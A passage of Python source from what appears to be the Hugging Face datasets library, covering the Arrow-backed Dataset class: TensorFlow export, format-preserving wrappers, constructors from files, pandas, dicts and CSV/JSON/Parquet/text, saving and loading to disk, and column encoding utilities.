(numeric data only). batch_size (:obj:`int`): Size of batches to load from the dataset. shuffle(:obj:`bool`): Shuffle the dataset order when loading. Recommended True for training, False for validation/evaluation. 
drop_remainder(:obj:`bool`, default ``None``): Drop the last incomplete batch when loading. If not provided, defaults to the same setting as shuffle. collate_fn(:obj:`Callable`): A function or callable object (such as a `DataCollator`) that will collate lists of samples into a batch. collate_fn_args (:obj:`Dict`, optional): An optional `dict` of keyword arguments to be passed to the `collate_fn`. label_cols (:obj:`List[str]` or :obj:`str`, default ``None``): Dataset column(s) to load as labels. Note that many models compute loss internally rather than letting Keras do it, in which case it is not necessary to actually pass the labels here, as long as they're in the input `columns`. dummy_labels (:obj:`bool`, default ``False``): If no `label_cols` are set, output an array of "dummy" labels with each batch. This can avoid problems with `fit()` or `train_on_batch()` that expect labels to be a Tensor or np.ndarray, but should (hopefully) not be necessary with our standard train_step(). prefetch (:obj:`bool`, default ``True``): Whether to run the dataloader in a separate thread and maintain a small buffer of batches for training. Improves performance by allowing data to be loaded in the background while the model is training. Returns: :class:`tf.data.Dataset` """ if config.TF_AVAILABLE: import tensorflow as tf else: raise ImportError("Called a Tensorflow-specific function but Tensorflow is not installed.") if collate_fn_args is None: collate_fn_args = {} if label_cols is None: label_cols = [] elif isinstance(label_cols, str): label_cols = [label_cols] elif len(set(label_cols)) < len(label_cols): raise ValueError("List of label_cols contains duplicates.") if not columns: raise ValueError("Need to specify at least one column.") elif isinstance(columns, str): columns = [columns] elif len(set(columns)) < len(columns): raise ValueError("List of columns contains duplicates.") if label_cols is not None: cols_to_retain = columns + label_cols else: cols_to_retain = columns if "label" in cols_to_retain or "labels" in cols_to_retain or "label_ids" in cols_to_retain: cols_to_retain += ["labels", "label", "label_ids"] # Don't accidentally drop any labels with other names! 
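        # Editor's note (illustrative, hypothetical values): with columns=["input_ids"] and
        # label_cols=["label"], cols_to_retain becomes
        # ["input_ids", "label", "labels", "label", "label_ids"] at this point and is
        # de-duplicated just below, so whichever of the common label spellings the dataset
        # actually uses is kept.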
cols_to_retain = list(set(cols_to_retain)) # Remove any duplicates if drop_remainder is None: # We assume that if you're shuffling it's the train set, so we drop the remainder unless told not to drop_remainder = shuffle retained_columns = [key for key in self.features.keys() if key in cols_to_retain] dataset = self.with_format("numpy", columns=retained_columns) columns_to_dtypes, output_signature = self._get_output_signature( dataset, collate_fn, collate_fn_args, batch_size=batch_size if drop_remainder else None ) all_columns = list(columns_to_dtypes.keys()) all_dtypes = list(columns_to_dtypes.values()) def np_get_batch(indices): batch = dataset[indices] actual_size = len(list(batch.values())[0]) # Get the length of one of the arrays, assume all same # Our collators expect a list of dicts, not a dict of lists/arrays, so we invert batch = [{key: value[i] for key, value in batch.items()} for i in range(actual_size)] batch = collate_fn(batch, **collate_fn_args) out_batch = [] for col, cast_dtype in columns_to_dtypes.items(): # In case the collate_fn returns something strange array = np.array(batch[col]) array = array.astype(cast_dtype) out_batch.append(array) return out_batch @tf.function(input_signature=[tf.TensorSpec(None, tf.int64)]) def fetch_function(indices): output = tf.numpy_function( # This works because dictionaries always output in insertion order np_get_batch, inp=[indices], Tout=[tf.dtypes.as_dtype(dtype) for dtype in all_dtypes], ) return {key: output[i] for i, key in enumerate(all_columns)} tf_dataset = tf.data.Dataset.from_tensor_slices(np.arange(len(dataset), dtype=np.int64)) if shuffle: tf_dataset = tf_dataset.shuffle(len(dataset)) def ensure_shapes(input_dict): return {key: tf.ensure_shape(val, output_signature[key].shape) for key, val in input_dict.items()} tf_dataset = tf_dataset.batch(batch_size, drop_remainder=drop_remainder).map(fetch_function).map(ensure_shapes) if label_cols: def split_features_and_labels(input_batch): if "labels" in columns or "label_ids" in columns or "label" in columns: columns.append("labels") if "labels" in label_cols or "label_ids" in label_cols or "label" in label_cols: label_cols.append("labels") # Some data collators add columns, so our logic is that newly added columns should go # into the input dict unless the user asked for them in labels instead features = { key: tensor for key, tensor in input_batch.items() if key in columns or key not in label_cols } labels = {key: tensor for key, tensor in input_batch.items() if key in label_cols} if len(features) == 1: features = list(features.values())[0] if len(labels) == 1: labels = list(labels.values())[0] return features, labels tf_dataset = tf_dataset.map(split_features_and_labels) elif len(columns) == 1: tf_dataset = tf_dataset.map(lambda x: list(x.values())[0]) if dummy_labels and not label_cols: def add_dummy_labels(input_batch): return input_batch, tf.zeros(tf.shape(input_batch[columns[0]])[0]) tf_dataset = tf_dataset.map(add_dummy_labels) if prefetch: tf_dataset = tf_dataset.prefetch(tf.data.experimental.AUTOTUNE) # Remove a reference to the open Arrow file on delete def cleanup_callback(ref): dataset.__del__() self._TF_DATASET_REFS.remove(ref) self._TF_DATASET_REFS.add(weakref.ref(tf_dataset, cleanup_callback)) return tf_dataset class DatasetTransformationNotAllowedError(Exception): pass def transmit_format(func): """Wrapper for dataset transforms that recreate a new Dataset to transmit the format of the original dataset to the new dataset""" @wraps(func) def wrapper(*args, **kwargs): if 
args: self: "Dataset" = args[0] args = args[1:] else: self: "Dataset" = kwargs.pop("self") # don't use self.format since it returns a list of columns for 'columns' even if self_format_columns is None unformatted_columns = set(self.column_names) - set(self._format_columns or []) self_format = { "type": self._format_type, "format_kwargs": self._format_kwargs, "columns": self._format_columns, "output_all_columns": self._output_all_columns, } # apply actual function out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] # re-apply format to the output for dataset in datasets: new_format = self_format.copy() if new_format["columns"] is not None: # new formatted columns = (columns - previously unformatted columns) # sort the columns to have a deterministic list of columns that we can compare with `out_format` new_format["columns"] = sorted(set(dataset.column_names) - unformatted_columns) out_format = { "type": dataset._format_type, "format_kwargs": dataset._format_kwargs, "columns": sorted(dataset._format_columns) if dataset._format_columns is not None else None, "output_all_columns": dataset._output_all_columns, } if out_format != new_format: # only apply if there's a change not to update the fingerprint for nothing dataset.set_format(**new_format) return out wrapper._decorator_name_ = "transmit_format" return wrapper def transmit_tasks(func): """Wrapper for dataset transforms that recreate a new Dataset to transmit the task templates of the original dataset to the new dataset""" @wraps(func) def wrapper(*args, **kwargs): if args: self: "Dataset" = args[0] args = args[1:] else: self: "Dataset" = kwargs.pop("self") # apply actual function out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] for dataset in datasets: # Remove task templates if a column mapping of the template is no longer valid if self.info.task_templates is not None: dataset.info.task_templates = [ template for template in self.info.task_templates if all(dataset.features.get(k) == self.features.get(k) for k in template.column_mapping.keys()) ] return out wrapper._decorator_name_ = "transmit_tasks" return wrapper def update_metadata_with_features(table: Table, features: Features): """To be used in dataset transforms that modify the features of the dataset, in order to update the features stored in the metadata of its schema.""" features = Features({col_name: features[col_name] for col_name in table.column_names}) if table.schema.metadata is None or "huggingface".encode("utf-8") not in table.schema.metadata: pa_metadata = ArrowWriter._build_metadata(DatasetInfo(features=features)) else: metadata = json.loads(table.schema.metadata["huggingface".encode("utf-8")].decode()) if "info" not in metadata: metadata["info"] = asdict(DatasetInfo(features=features)) else: metadata["info"]["features"] = asdict(DatasetInfo(features=features))["features"] pa_metadata = {"huggingface": json.dumps(metadata)} table = table.replace_schema_metadata(pa_metadata) return table def _check_table(table) -> Table: """We check the table type to make sure it's an instance of :class:`datasets.table.Table`""" if isinstance(table, pa.Table): # for a pyarrow table, we can just consider it as a in-memory table # this is here for backward compatibility return InMemoryTable(table) elif isinstance(table, Table): return table else: raise TypeError(f"Expected a pyarrow.Table or a 
datasets.table.Table object, but got {table}.") def _check_column_names(column_names: List[str]): """Check the column names to make sure they don't contain duplicates.""" counter = Counter(column_names) if not all(count == 1 for count in counter.values()): duplicated_columns = [col for col in counter if counter[col] > 1] raise ValueError(f"The table can't have duplicated columns but columns {duplicated_columns} are duplicated.") def _check_if_features_can_be_aligned(features_list: List[Features]): """Check if the dictionaries of features can be aligned. Two dictonaries of features can be aligned if the keys they share have the same type or some of them is of type `Value("null")`. """ name2feature = {} for features in features_list: for k, v in features.items(): if k not in name2feature or (isinstance(name2feature[k], Value) and name2feature[k].dtype == "null"): name2feature[k] = v for features in features_list: for k, v in features.items(): if not (isinstance(v, Value) and v.dtype == "null") and name2feature[k] != v: raise ValueError( f'The features can\'t be aligned because the key {k} of features {features} has unexpected type - {v} (expected either {name2feature[k]} or Value("null").' ) def _align_features(features_list: List[Features]) -> List[Features]: """Align dictionaries of features so that the keys that are found in multiple dictionaries share the same feature.""" name2feature = {} for features in features_list: for k, v in features.items(): if k not in name2feature or (isinstance(name2feature[k], Value) and name2feature[k].dtype == "null"): name2feature[k] = v return [Features({k: name2feature[k] for k in features.keys()}) for features in features_list] class NonExistentDatasetError(Exception): """Used when we expect the existence of a dataset""" pass class Dataset(DatasetInfoMixin, IndexableMixin, TensorflowDatasetMixin): """A Dataset backed by an Arrow table.""" def __init__( self, arrow_table: Table, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_table: Optional[Table] = None, fingerprint: Optional[str] = None, ): info = info.copy() if info is not None else DatasetInfo() DatasetInfoMixin.__init__(self, info=info, split=split) IndexableMixin.__init__(self) self._data: Table = _check_table(arrow_table) self._indices: Optional[Table] = _check_table(indices_table) if indices_table is not None else None maybe_register_dataset_for_temp_dir_deletion(self) self._format_type: Optional[str] = None self._format_kwargs: dict = {} self._format_columns: Optional[list] = None self._output_all_columns: bool = False self._fingerprint: str = fingerprint # Read metadata if self._data.schema.metadata is not None and "huggingface".encode("utf-8") in self._data.schema.metadata: metadata = json.loads(self._data.schema.metadata["huggingface".encode("utf-8")].decode()) if "info" in metadata and self.info.features is None: # try to load features from the arrow file metadata self._info.features = DatasetInfo.from_dict(metadata["info"]).features if ( "fingerprint" in metadata and self._fingerprint is None ): # try to load fingerprint from the arrow file metadata self._fingerprint = metadata["fingerprint"] # Infer features if None inferred_features = Features.from_arrow_schema(arrow_table.schema) if self.info.features is None: self.info.features = inferred_features else: # make sure the nested columns are in the right order self.info.features = self.info.features.reorder_fields_as(inferred_features) # Infer fingerprint if None if self._fingerprint is None: 
self._fingerprint = generate_fingerprint(self) # Sanity checks if self.features is None: raise ValueError("Features can't be None in a Dataset object") if self._fingerprint is None: raise ValueError("Fingerprint can't be None in a Dataset object") if self.info.features.type != inferred_features.type: raise ValueError( f"External features info don't match the dataset:\nGot\n{self.info.features}\nwith type\n{self.info.features.type}\n\nbut expected something like\n{inferred_features}\nwith type\n{inferred_features.type}" ) if self._indices is not None: if not pa.types.is_unsigned_integer(self._indices.column(0)[0].type): raise ValueError( f"indices must be an Arrow table of unsigned integers, current type is {self._indices.column(0)[0].type}" ) _check_column_names(self._data.column_names) self._data = update_metadata_with_features(self._data, self.features) @classmethod def from_file( cls, filename: str, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_filename: Optional[str] = None, in_memory: bool = False, ) -> "Dataset": """Instantiate a Dataset backed by an Arrow table at filename. Args: filename (:obj:`str`): File name of the dataset. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. indices_filename (:obj:`str`, optional): File names of the indices. in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. Returns: :class:`Dataset` """ table = ArrowReader.read_table(filename, in_memory=in_memory) if indices_filename is not None: indices_pa_table = ArrowReader.read_table(indices_filename, in_memory=in_memory) else: indices_pa_table = None return cls( arrow_table=table, info=info, split=split, indices_table=indices_pa_table, ) @classmethod def from_buffer( cls, buffer: pa.Buffer, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_buffer: Optional[pa.Buffer] = None, ) -> "Dataset": """Instantiate a Dataset backed by an Arrow buffer. Args: buffer (:obj:`pyarrow.Buffer`): Arrow buffer. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. indices_buffer (:obj:`pyarrow.Buffer`, optional): Indices Arrow buffer. Returns: :class:`Dataset` """ table = InMemoryTable.from_buffer(buffer) if indices_buffer is not None: indices_table = InMemoryTable.from_buffer(buffer) else: indices_table = None return cls(table, info=info, split=split, indices_table=indices_table) @classmethod def from_pandas( cls, df: pd.DataFrame, features: Optional[Features] = None, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, ) -> "Dataset": """ Convert :obj:`pandas.DataFrame` to a :obj:`pyarrow.Table` to create a :class:`Dataset`. The column types in the resulting Arrow Table are inferred from the dtypes of the pandas.Series in the DataFrame. In the case of non-object Series, the NumPy dtype is translated to its Arrow equivalent. In the case of `object`, we need to guess the datatype by looking at the Python objects in this Series. Be aware that Series of the `object` dtype don't carry enough information to always lead to a meaningful Arrow type. In the case that we cannot infer a type, e.g. because the DataFrame is of length 0 or the Series only contains None/nan objects, the type is set to null. This behavior can be avoided by constructing explicit features and passing it to this function. 
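        Example (editor's illustrative sketch; the data below is hypothetical)::

            import pandas as pd
            df = pd.DataFrame({"text": ["good movie", "bad movie"], "label": [1, 0]})
            ds = Dataset.from_pandas(df)
            # ds.column_names -> ['text', 'label']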
Args: df (:obj:`pandas.DataFrame`): Dataframe that contains the dataset. features (:class:`Features`, optional): Dataset features. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. Returns: :class:`Dataset` """ if info is not None and features is not None and info.features != features: raise ValueError( f"Features specified in `features` and `info.features` can't be different:\n{features}\n{info.features}" ) features = features if features is not None else info.features if info is not None else None if info is None: info = DatasetInfo() info.features = features table = InMemoryTable.from_pandas(df=df, schema=pa.schema(features.type) if features is not None else None) return cls(table, info=info, split=split) @classmethod def from_dict( cls, mapping: dict, features: Optional[Features] = None, info: Optional[Any] = None, split: Optional[Any] = None, ) -> "Dataset": """ Convert :obj:`dict` to a :obj:`pyarrow.Table` to create a :class:`Dataset`. Args: mapping (:obj:`Mapping`): Mapping of strings to Arrays or Python lists. features (:class:`Features`, optional): Dataset features. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. Returns: :class:`Dataset` """ if info is not None and features is not None and info.features != features: raise ValueError( f"Features specified in `features` and `info.features` can't be different:\n{features}\n{info.features}" ) features = features if features is not None else info.features if info is not None else None if info is None: info = DatasetInfo() info.features = features if features is not None: mapping = features.encode_batch(mapping) mapping = { col: OptimizedTypedSequence(data, type=features.type[col].type if features is not None else None, col=col) for col, data in mapping.items() } pa_table = InMemoryTable.from_pydict(mapping=mapping) return cls(pa_table, info=info, split=split) @staticmethod def from_csv( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, **kwargs, ): """Create Dataset from CSV file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the CSV file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. **kwargs: Keyword arguments to be passed to :meth:`pandas.read_csv`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.csv import CsvDatasetReader return CsvDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, **kwargs ).read() @staticmethod def from_json( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, field: Optional[str] = None, **kwargs, ): """Create Dataset from JSON or JSON Lines file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the JSON or JSON Lines file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. 
features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. field (:obj:`str`, optional): Field name of the JSON file where the dataset is contained in. **kwargs: Keyword arguments to be passed to :class:`JsonConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.json import JsonDatasetReader return JsonDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, field=field, **kwargs, ).read() @staticmethod def from_parquet( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, columns: Optional[List[str]] = None, **kwargs, ): """Create Dataset from Parquet file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the Parquet file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. columns (:obj:`List[str]`, optional): If not None, only these columns will be read from the file. A column name may be a prefix of a nested field, e.g. 'a' will select 'a.b', 'a.c', and 'a.d.e'. **kwargs: Keyword arguments to be passed to :class:`ParquetConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.parquet import ParquetDatasetReader return ParquetDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, columns=columns, **kwargs, ).read() @staticmethod def from_text( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, **kwargs, ): """Create Dataset from text file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the text file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. **kwargs: Keyword arguments to be passed to :class:`TextConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.text import TextDatasetReader return TextDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, **kwargs ).read() def __del__(self): if hasattr(self, "_data"): del self._data if hasattr(self, "_indices"): del self._indices def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): # Here `del` is used to del the pyarrow tables. This properly closes the files used for memory mapped tables self.__del__() def save_to_disk(self, dataset_path: str, fs=None): """ Saves a dataset to a dataset directory, or in a filesystem using either :class:`~filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``. Args: dataset_path (:obj:`str`): Path (e.g. `dataset/train`) or remote URI (e.g. 
`s3://my-bucket/dataset/train`) of the dataset directory where the dataset will be saved to. fs (:class:`~filesystems.S3FileSystem`, ``fsspec.spec.AbstractFileSystem``, optional, defaults ``None``): Instance of the remote filesystem used to download the files from. """ if self.list_indexes(): raise ValueError("please remove all the indexes using `dataset.drop_index` before saving a dataset") dataset = self.flatten_indices() if self._indices is not None else self if is_remote_filesystem(fs): dataset_path = extract_path_from_uri(dataset_path) else: fs = fsspec.filesystem("file") cache_files_paths = [Path(cache_filename["filename"]) for cache_filename in self.cache_files] # Check that the dataset doesn't overwrite iself. It can cause a permission error on Windows and a segfault on linux. if Path(dataset_path, config.DATASET_ARROW_FILENAME) in cache_files_paths: raise PermissionError( f"Tried to overwrite {Path(dataset_path, config.DATASET_ARROW_FILENAME)} but a dataset can't overwrite itself." ) if Path(dataset_path, config.DATASET_INDICES_FILENAME) in cache_files_paths: raise PermissionError( f"Tried to overwrite {Path(dataset_path, config.DATASET_INDICES_FILENAME)} but a dataset can't overwrite itself." ) # Get json serializable state state = { key: dataset.__dict__[key] for key in [ "_fingerprint", "_format_columns", "_format_kwargs", "_format_type", "_indexes", "_output_all_columns", ] } split = dataset.__dict__["_split"] state["_split"] = str(split) if split is not None else split state["_data_files"] = [{"filename": config.DATASET_ARROW_FILENAME}] for k in state["_format_kwargs"].keys(): try: json.dumps(state["_format_kwargs"][k]) except TypeError as e: raise TypeError( str(e) + f"\nThe format kwargs must be JSON serializable, but key '{k}' isn't." ) from None # Get json serializable dataset info dataset_info = asdict(dataset._info) # Save dataset + indices + state + info fs.makedirs(dataset_path, exist_ok=True) with fs.open(Path(dataset_path, config.DATASET_ARROW_FILENAME).as_posix(), "wb") as dataset_file: with ArrowWriter(stream=dataset_file) as writer: writer.write_table(dataset._data) writer.finalize() with fs.open( Path(dataset_path, config.DATASET_STATE_JSON_FILENAME).as_posix(), "w", encoding="utf-8" ) as state_file: json.dump(state, state_file, indent=2, sort_keys=True) with fs.open( Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix(), "w", encoding="utf-8" ) as dataset_info_file: # Sort only the first level of keys, or we might shuffle fields of nested features if we use sort_keys=True sorted_keys_dataset_info = {key: dataset_info[key] for key in sorted(dataset_info)} json.dump(sorted_keys_dataset_info, dataset_info_file, indent=2) logger.info(f"Dataset saved in {dataset_path}") @staticmethod def _build_local_temp_path(uri_or_path: str) -> Path: """ Builds and returns a Path concatenating a local temporary dir with the dir path (or absolute/relative path extracted from the uri) passed. Args: uri_or_path (:obj:`str`): Path (e.g. `"dataset/train"`) or remote URI (e.g. `"s3://my-bucket/dataset/train"`) to concatenate. 
Returns: :class:`Path`: the concatenated path (temp dir + path) """ src_dataset_path = Path(uri_or_path) tmp_dir = get_temporary_cache_files_directory() return Path(tmp_dir, src_dataset_path.relative_to(src_dataset_path.anchor)) @staticmethod def load_from_disk(dataset_path: str, fs=None, keep_in_memory: Optional[bool] = None) -> "Dataset": """ Loads a dataset that was previously saved using :meth:`save_to_disk` from a dataset directory, or from a filesystem using either :class:`~filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``. Args: dataset_path (:obj:`str`): Path (e.g. `"dataset/train"`) or remote URI (e.g. `"s3//my-bucket/dataset/train"`) of the dataset directory where the dataset will be loaded from. fs (:class:`~filesystems.S3FileSystem`, ``fsspec.spec.AbstractFileSystem``, optional, default ``None``): Instance of the remote filesystem used to download the files from. keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section. Returns: :class:`Dataset` or :class:`DatasetDict`: - If `dataset_path` is a path of a dataset directory: the dataset requested. - If `dataset_path` is a path of a dataset dict directory: a ``datasets.DatasetDict`` with each split. """ # copies file from filesystem if it is remote filesystem to local filesystem and modifies dataset_path to temp directory containing local copies fs = fsspec.filesystem("file") if fs is None else fs dataset_dict_json_path = Path(dataset_path, config.DATASETDICT_JSON_FILENAME).as_posix() dataset_info_path = Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix() if not fs.isfile(dataset_info_path) and fs.isfile(dataset_dict_json_path): raise FileNotFoundError( f"No such file or directory: '{dataset_info_path}'. Expected to load a Dataset object, but got a DatasetDict. Please use datasets.load_from_disk instead." 
) if is_remote_filesystem(fs): src_dataset_path = extract_path_from_uri(dataset_path) dataset_path = Dataset._build_local_temp_path(src_dataset_path) fs.download(src_dataset_path, dataset_path.as_posix(), recursive=True) with open( Path(dataset_path, config.DATASET_STATE_JSON_FILENAME).as_posix(), "r", encoding="utf-8" ) as state_file: state = json.load(state_file) with open( Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix(), "r", encoding="utf-8" ) as dataset_info_file: dataset_info = DatasetInfo.from_dict(json.load(dataset_info_file)) dataset_size = estimate_dataset_size( Path(dataset_path, data_file["filename"]) for data_file in state["_data_files"] ) keep_in_memory = keep_in_memory if keep_in_memory is not None else is_small_dataset(dataset_size) table_cls = InMemoryTable if keep_in_memory else MemoryMappedTable arrow_table = concat_tables( table_cls.from_file(Path(dataset_path, data_file["filename"]).as_posix()) for data_file in state["_data_files"] ) split = state["_split"] split = Split(split) if split is not None else split return Dataset( arrow_table=arrow_table, info=dataset_info, split=split, fingerprint=state["_fingerprint"], ) @property def data(self) -> Table: """The Apache Arrow table backing the dataset.""" return self._data @property def cache_files(self) -> List[dict]: """The cache files containing the Apache Arrow table backing the dataset.""" cache_files = list_table_cache_files(self._data) if self._indices is not None: cache_files += list_table_cache_files(self._indices) return [{"filename": cache_filename} for cache_filename in cache_files] @property def num_columns(self) -> int: """Number of columns in the dataset.""" return self._data.num_columns @property def num_rows(self) -> int: """Number of rows in the dataset (same as :meth:`Dataset.__len__`).""" if self._indices is not None: return self._indices.num_rows return self._data.num_rows @property def column_names(self) -> List[str]: """Names of the columns in the dataset.""" return self._data.column_names @property def shape(self) -> Tuple[int, int]: """Shape of the dataset (number of columns, number of rows).""" if self._indices is not None: return (self._indices.num_rows, self._data.num_columns) return self._data.shape def unique(self, column: str) -> List[Any]: """Return a list of the unique elements in a column. This is implemented in the low-level backend and as such, very fast. Args: column (:obj:`str`): Column name (list all the column names with :func:`datasets.Dataset.column_names`). Returns: :obj:`list`: List of unique elements in the given column. """ if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") if self._indices is not None and self._indices.num_rows != self._data.num_rows: dataset = self.flatten_indices() else: dataset = self return dataset._data.column(column).unique().to_pylist() def class_encode_column(self, column: str, include_nulls: bool = False) -> "Dataset": """Casts the given column as :obj:``datasets.features.ClassLabel`` and updates the table. Args: column (`str`): The name of the column to cast (list all the column names with :func:`datasets.Dataset.column_names`) include_nulls (`bool`, default `False`): Whether to include null values in the class labels. If True, the null values will be encoded as the `"None"` class label. .. 
versionadded:: 1.14.2 """ # Sanity checks if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") src_feat = self.features[column] if not isinstance(src_feat, Value): raise ValueError( f"Class encoding is only supported for {Value.__name__} column, and column {column} is {type(src_feat).__name__}." ) if src_feat.dtype != "string" or (include_nulls and None in self.unique(column)): def stringify_column(batch): batch[column] = [ str(sample) if include_nulls or sample is not None else None for sample in batch[column] ] return batch dset = self.map( stringify_column, batched=True, desc="Stringifying the column", ) else: dset = self # Create the new feature class_names = sorted(sample for sample in dset.unique(column) if include_nulls or sample is not None) dst_feat = ClassLabel(names=class_names) def cast_to_class_labels(batch): batch[column] = [ dst_feat.str2int(sample) if include_nulls or sample is not None else None for sample in batch[column] ] return batch dset = dset.map( cast_to_class_labels, batched=True, desc="Casting to class labels", ) new_features = dset.features.copy() new_features[column] = dst_feat dset = dset.cast(new_features) return dset @deprecated() @fingerprint_transform(inplace=True) def dictionary_encode_column_(self, column: str): """Dictionary encode a column. Dictionary encode can reduce the size of a column with many repetitions (e.g. string labels columns) by storing a dictionary of the strings. This only affect the internal storage. .. deprecated:: 1.4.0 Args: column (:obj:`str`): """ if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") casted_schema: pa.Schema = self._data.schema field_index = casted_schema.get_field_index(column) field: pa.Field = casted_schema.field(field_index) casted_field = pa.field(field.name, pa.dictionary(pa.int32(), field.type), nullable=False) casted_schema.set(field_index, casted_field) self._data = self._data.cast(casted_schema) self.info.features = Features.from_arrow_schema(self._data.schema) self._data = update_metadata_with_features(self._data, self.features) @deprecated(help_message="Use Dataset.flatten instead.") @fingerprint_transform(inplace=True) def flatten_(self, max_depth=16): """In-place version of :meth:`Dataset.flatten`. .. deprecated:: 1.4.0 Use :meth:`Dataset.flatten` instead. """ for depth in range(1, max_depth): if any(isinstance(field.type, pa.StructType) for field in self._data.schema): self._data = self._data.flatten() else: break self.info.features = Features.from_arrow_schema(self._data.schema) self._data = update_metadata_with_features(self._data, self.features) logger.info(f'Flattened dataset from depth {depth} to depth { 1 if depth + 1 < max_depth else "unknown"}.') @fingerprint_transform(inplace=False) def flatten(self, new_fingerprint, max_depth=16) -> "Dataset": """Flatten the table. Each column with a struct type is flattened into one column per struct field. Other columns are left unchanged. Returns: :class:`Dataset`: A copy of the dataset with flattened columns. 
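        Example (editor's illustrative sketch; the data below is hypothetical)::

            ds = Dataset.from_dict({"answers": [{"text": "Paris", "answer_start": 3}]})
            ds.flatten().column_names  # -> ['answers.text', 'answers.answer_start']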
""" dataset = copy.deepcopy(self) for depth in range(1, max_depth): if any(isinstance(field.type, pa.StructType) for field in dataset._data.schema): dataset._data = dataset._data.flatten() else: break dataset.info.features = Features.from_arrow_schema(dataset._data.schema) dataset._data = update_metadata_with_features(dataset._data, dataset.features) logger.info(f'Flattened dataset from depth {depth} to depth {1 if depth + 1 < max_depth else "unknown"}.') dataset._fingerprint = new_fingerprint return dataset @deprecated(help_message="Use Dataset.cast instead.") def cast_( self, features: Features, batch_size: Optional[int] = 10_000, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 10_000, num_proc: Optional[int] = None, ): """In-place version of :meth:`Dataset.cast`. .. deprecated:: 1.4.0 Use :meth:`Dataset.cast` instead. Args: features (:class:`datasets.Features`): New features to cast the dataset to. The name of the fields in the features must match the current column names. The type of the data must also be convertible from one type to the other. For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset. batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to cast. `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to cast. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. 